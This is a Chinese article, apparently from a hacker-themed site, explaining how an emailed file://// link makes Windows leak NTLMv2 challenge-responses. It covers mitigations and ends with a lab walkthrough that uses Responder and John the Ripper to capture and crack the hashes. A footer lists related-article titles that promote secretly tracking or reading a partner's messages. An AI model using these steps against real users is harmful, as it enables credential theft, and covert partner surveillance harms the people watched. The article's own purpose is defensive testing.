一封邮件就能捕获你的口令散列值_可以看到

访客4年前黑客文章730

恶意黑客发封电子邮件就能诱使你的Windows系统到远程服务器上验证身份——交出系统口令散列值。不信?试试就知道!

如果还没采用比大多数安全专家建议的长得多的口令,那你更好注意了:只需要一封电子邮件,嵌入里面的链接就可以促使你的系统向远程服务器发起身份验证,作为验证尝试的系统口令散列值就是远程服务器的囊中之物了。相信我,破解散列加密没那么难的。

为什么可以通过电子邮件捕获口令散列?

计算机通过软件连接Web服务器时通常默认选择匿名方式。匿名连接失败1次或多次后,往往就切换成用当前活跃登录凭证来尝试连接。支持Windows集成验证的计算机可能会以用户的Windows身份验证凭证自动登录。用户根本察觉不到这一切。只有自动验证失败,用户才会看到弹出的手动登录框。

自动化集成Windows身份验证是很有必要的单点登录(SSO)功能,尤其是对本地资源和受信服务器而言。该功能可使用户在登录公司环境中不同服务器时省去重复的登录凭证提交操作。当前主流浏览器绝大多数都不同程度地支持这一功能。

1990年代末,恶意黑客滥用该功能捕获用户的Windows身份验证凭证。他们向用户发送电子邮件,诱使用户点击其中链接(或促使其电子邮件客户端秘密响应内嵌不可见单像素Web信标),然后用户的计算机就会悄悄连接上流氓服务器了。只要Windows集成身份验证功能开启(通常都开启的),用户的计算机便会向流氓远程Web服务器发送用户的企业登录凭证。

事实上,发送出去的是用户的局域网管理器(LM)或 Windows NT LM *** 身份验证挑战响应,从中可以计算出用户的LM或NT散列值。

微软后来禁用了用户用Windows身份验证凭证向局域网外服务器的默认发送,在 IE 4 或 IE 5 时启用了该新的默认发送功能。如今,你可以打开IE高级设置(互联网选项->高级->启用集成Windows身份验证),勾选或取消该功能。很多人都认为这样就阻止了上述攻击。

但事实往往打脸,如今仍有很多 *** 可以诱使Windows(及其他支持Windows集成身份验证的软件程序,比如谷歌Chrome)向远程服务器发送NTLM *** 身份验证挑战。最起码,以 file:////<serverhostaddress>/<anyfilename> 的格式嵌入一条链接即可,例如:file:////contoso.com/index.html。

将上述例子中的 contoso.com 替换成有效远程服务器域名,浏览器就会尝试通过 TCP 445 端口上的NTLMv2连接(默认)向远程服务器发起 *** B/NetBIOS验证。如果开启NetBIOS监听,该监听进程会以有效 *** B/NetBIOS挑战响应NTLMv2连接,服务器便会获得客户端的NTLMv2挑战响应,进而从中计算出用户的NT散列值。剩下的就是破解该散列或者执行重放攻击的事儿了。

除非禁止 TCP 445 端口出站流量,否则无论IE中Windows集成身份验证设置是否勾选,结果都是一样的——用户NT散列值被获取。

只要点击内嵌的 file://// 链接,用户的NTLM响应挑战确实会被发送至远程服务器。这一攻击适用于:

  • 局域网和互联网
  • 补丁齐全但保持默认设置的系统
  • Windows防火墙保持默认状态的系统
  • 本地SAM账户和活动目录(AD)账户

远程攻击者将会获得你的主机名、域名和NTLMv2挑战响应,且大多数企业环境中都有效。这可真是个不幸的消息。

可能的解决方案

好消息是:补丁完整的系统上,仅仅打开电子邮件而不点击其中链接是不会受害的。曾经有补丁描述称,在微软 Office 365 中使用RTF电子邮件可以成功攻击,但该漏洞似乎已补上。这是件好事,毕竟没人想体验仅仅打开一封电子邮件就中招的经历。当然,我们都知道,诱使用户点击链接也不是多难。所以,切记:乱点邮件中的链接可能导致企业口令被盗。

*** 安全分析师 Rob Tompkins 对很多软件进行了电邮链接盗口令的尝试。他发现,即便封锁了企业 *** 的 TCP 445 端口以阻止恶意 *** B/NetBIOS出站连接,只要某移动设备没在本地防火墙中封禁该端口,当该设备离开企业 *** ,其NTLM挑战响应也会成功传输到远程服务器上。这是个很重要的发现,Rob还找了个AlienVault规则/特征码来识别此类攻击。

安装微软补丁

2017年11月,微软为 Windows 10 和 Windows Server 16 发布了相关补丁和注册表设置,要求用户启用Windows防火墙并定义能够使用 NTLM SSO 的 *** 。这些要求意味着大量企业无法应用该补丁。另外,坊间传闻,没精确定义允许 *** 的公司企业遭遇了服务宕机。所以,请小心谨慎地尝试应用该补丁。

采用强口令并封禁未授权身份验证端口

有足够加密熵的强口令无论破解器有多强大都无法破解。强口令应成为对抗此类攻击的头号防御。另外,毫无疑问,封禁未授权出站身份验证端口也是必须要做的,比如用普通过滤 *** 封掉MB/NETBIOS,以及滤掉 file://// 记号。

如何测试该漏洞

想要测试自家公司及其软件是否免疫此类攻击?搭个由Linux服务器和Windows客户机组成的双机实验室,1个小时就能测出。

首先,下个基于Python的Responder程序。Responder是个超有用的工具,可以用来观察基于 *** 的口令散列盗窃。该工具具备自动“中毒”LLMNR(微软Windows本地名称解析协议)、NetBIOS和多播DNS(mDNS)的能力,可以当做流氓服务器使用(Web、NetBIOS、SQL、FTP和LDAP)。网上有很多视频教人如何使用Responder中毒和捕获NTLM挑战响应。

如果不想自己花时间设置Responder,可以下载个 Kali Linux,然后如下操作:

  1. 以root账户登录,口令是toor;
  2. 点击Application菜单,选择 09 Sniffing and Spoofing,运行Responder;
  3. 然后执行 responder -I eth0 –v (指出监听IP地址);

在Windows机器上:

  1. 打开文件浏览器,连接 file:////<linuxIPaddress>/test.htlm (或者任意文件名);
  2. Responder将获取NTLM挑战响应;

想要破解散列值,回到Linux机器上:

  1. 打开终端会话;
  2. 输入 cd /usr/share/responder/logs;
  3. 运行 John the Ripper 以破解该日志文件中的散列值john HTTP-NTLMv2… 或者 john *** B….

用黑客工具验证各种漏洞还挺有意思。当然,最主要的是学到了点击电子邮件中的链接可能会惹出 *** 烦,从而在现实生活中不再犯蠢。

微软2017年11月的补丁:

Responder地址:

标签: 好话题

相关文章

赌博无法提款自学成 才,攻击境外拨猜网站日进万元

前言赌博无法提款自学成黑客,攻击境外伯才网站日进万米,徐某及其团伙因涉嫌非法控制计算机信息系统罪被捕。昨日上午,巴南警方通报了一起网络犯罪案件——巴南区28岁小伙徐某,因在网络赌博时赢了一万多米无法提...

微信如何定位好友位置,并且不让好友知道_微信定位

微信如何定位好友位置,并且不让好友知道,当今,固然上网非常利便,但非常多小同伴秀都稀饭用少许小贴士。非常多人想晓得微信是否能隐秘定位密友地位,但连续没有人发掘。辣么该奈何做呢?咱们和小编一路来看看。微...

在自己手机上看老婆跟谁聊天(怎样偷偷接收老婆的微信聊天)_微信聊天

在自己手机上看老婆跟谁聊天(怎样偷偷接收老婆的微信聊天),婆媳疑问是中国5000年来连续没有办理的永久疑问。我在媳妇和母亲之间摆布尴尬,但也为此蒙受了充足的难受。当我不当心翻开媳妇的手机时,我认识到媳...

如何知道对方位置但不被对方知道(教你几个小技巧)

如何知道对方位置但不被对方知道(教你几个小技巧) 许多时分,女人不必然不爱男子,而是太累了。许多感觉都是如许的。早先,男子酷爱并最活泼。后来男子爱得越来越少,后来女人爱得越来越多,女人彻底无法自拔。...

个人品牌形象定位与打造经验分享

所谓个人品牌就像是一堆黄橙子中的青苹果不用做过多的介绍和烘托就已经脱颖而出,引人注目 我不知道,现在正在看这篇文章的你,是怎么关注到我的,唯一可以肯定的是,因为有了分享,才会有了被关注,因为有了表达,...

黑客教你一分钟盗号,WordPress黑客攻击近100万个网站_WordPress

Facebook再曝隐私问题:150多万用户数据被公开在亚马逊云服务器上,Facebook周三显露,自2016年5月以来,该公司大概“不测上传”了150万名新用户的电子邮件接洽人,这宛若是社群媒体巨擘...